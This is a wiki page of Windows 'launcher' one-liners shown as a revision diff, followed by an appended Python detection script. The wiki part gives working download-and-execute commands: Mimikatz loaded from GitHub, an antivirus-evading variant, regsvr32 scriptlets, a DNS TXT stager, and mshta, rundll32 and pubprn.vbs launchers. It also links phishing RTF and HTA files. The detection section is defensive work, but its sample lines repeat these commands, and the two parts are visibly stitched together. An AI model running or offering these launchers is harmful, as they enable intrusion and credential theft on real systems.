Launchers: Difference between revisions

From WikiWiki
No edit summary
(11 intermediate revisions by the same user not shown)
<syntaxhighlight lang="powershell">
#runs mimikatz straight from github
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz
#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri https://mendelonline.be/security/poc/test.code.txt).content;invoke-bananas
</syntaxhighlight>

<syntaxhighlight lang="powershell">
#starts calc
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test.sct scrobj.dll
#starts powershell that runs mimikatz
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test2.sct scrobj.dll
#start calc - https://twitter.com/vysecurity/status/857734235695796225
powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt calc.mendelonline.be ))[5]"
#run calc via vbs
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:https://mendelonline.be/security/poc/runcalc.sct
</syntaxhighlight>

* https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1
* more subtee: https://github.com/subTee/windows-operating-system-archaeology/blob/master/Evasion/pubprn_injection.txt
* powershell encodedcommand: https://mendelonline.be/tools/powershell-encodecommand.php

=phishing docs=
* Credits.rtf - https://mendelonline.be/security/poc/Credits.rtf - run mshta from rtf
* "Show information.hta" - https://mendelonline.be/security/poc/Show%20information.hta - run code from hta file

=more=
* subtee's gists: https://gist.github.com/subTee

Revision as of 15:14, 8 May 2017

Some fun one-liners to start a script

<syntaxhighlight lang="powershell">
mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject('WScript.Shell');w.Exec('calc')");
</syntaxhighlight>

* https://twitter.com/ch33kyf3ll0w/status/816319597645328384
* https://gist.github.com/subTee/62fc28bb5dc58dbe9efdd56d65921bd2
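From the defender's side, every launcher on this page leaves a distinctive process command line. The following is an added detection example, not code from the wiki: it assumes raw command-line strings as logged by Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled, the rule names are my own, and the sample lines are constructed with placeholder hosts.

```python
import re

# Detection rules for the launcher patterns this page lists. Each is a case-insensitive
# regex over one process command line (Sysmon EID 1 / Security 4688). Constructed example.
LAUNCHER_RULES = {
    # regsvr32 fetching a remote scriptlet via the scrobj.dll /i: handler
    "regsvr32_remote_scriptlet": re.compile(
        r"regsvr32(\.exe)?\b.*\s/i:\s*(https?|ftp):.*scrobj\.dll", re.I),
    # mshta executing an inline vbscript:/javascript: URI that loads a scriptlet
    "mshta_inline_script": re.compile(
        r"mshta(\.exe)?\b.*(vbscript|javascript):.*script:", re.I),
    # rundll32 abusing mshtml RunHTMLApplication with an inline javascript: URI
    "rundll32_javascript": re.compile(
        r"rundll32(\.exe)?\b.*javascript:.*RunHTMLApplication", re.I),
    # pubprn.vbs handed a script: moniker instead of a printer name
    "pubprn_scriptlet": re.compile(r"pubprn\.vbs\b.*script:", re.I),
    # powershell pulling its payload out of a DNS TXT record via nslookup
    "powershell_dns_txt_stager": re.compile(
        r"powershell(\.exe)?\b.*nslookup(\.exe)?\s+-q=txt", re.I),
    # download-and-evaluate: Invoke-Expression / iex paired with Invoke-WebRequest
    "powershell_download_iex": re.compile(
        r"(invoke-expression|\biex\b).*invoke-webrequest"
        r"|invoke-webrequest.*(invoke-expression|\biex\b)", re.I),
}

def classify(cmdline):
    """Return the names of all rules matching one command line ([] when clean)."""
    return [name for name, rx in LAUNCHER_RULES.items() if rx.search(cmdline)]

def scan(cmdlines):
    """Return {cmdline: [rule names]} containing only the suspicious lines."""
    return {c: classify(c) for c in cmdlines if classify(c)}

# Constructed sample command lines modelled on the page's one-liners; hosts are placeholders.
# The benign regsvr32, rundll32 and powershell lines are there to show the rules stay quiet.
SAMPLE_CMDLINES = [
    "regsvr32 /u /n /s /i:https://stage.example.invalid/t.sct scrobj.dll",
    "regsvr32 /s \"C:\\Program Files\\Vendor\\vendor.dll\"",
    'mshta.exe vbscript:GetObject("script:https://stage.example.invalid/x.sct")(window.close)',
    'rundll32.exe javascript:"\\..\\mshtml.dll,RunHTMLApplication ";eval("1")',
    "rundll32.exe shell32.dll,Control_RunDLL",
    'powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt c.example.invalid ))[5]"',
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    'cscript C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs x "script:https://stage.example.invalid/r.sct"',
    'powershell -c "invoke-expression (Invoke-WebRequest -Uri https://stage.example.invalid/p.txt).content"',
]

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_CMDLINES).items():
        print(", ".join(rules), "<-", cmd)
```

Six of the nine constructed lines are flagged and the three benign ones are not; in practice feed `scan()` the CommandLine field of your endpoint telemetry rather than the sample list.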
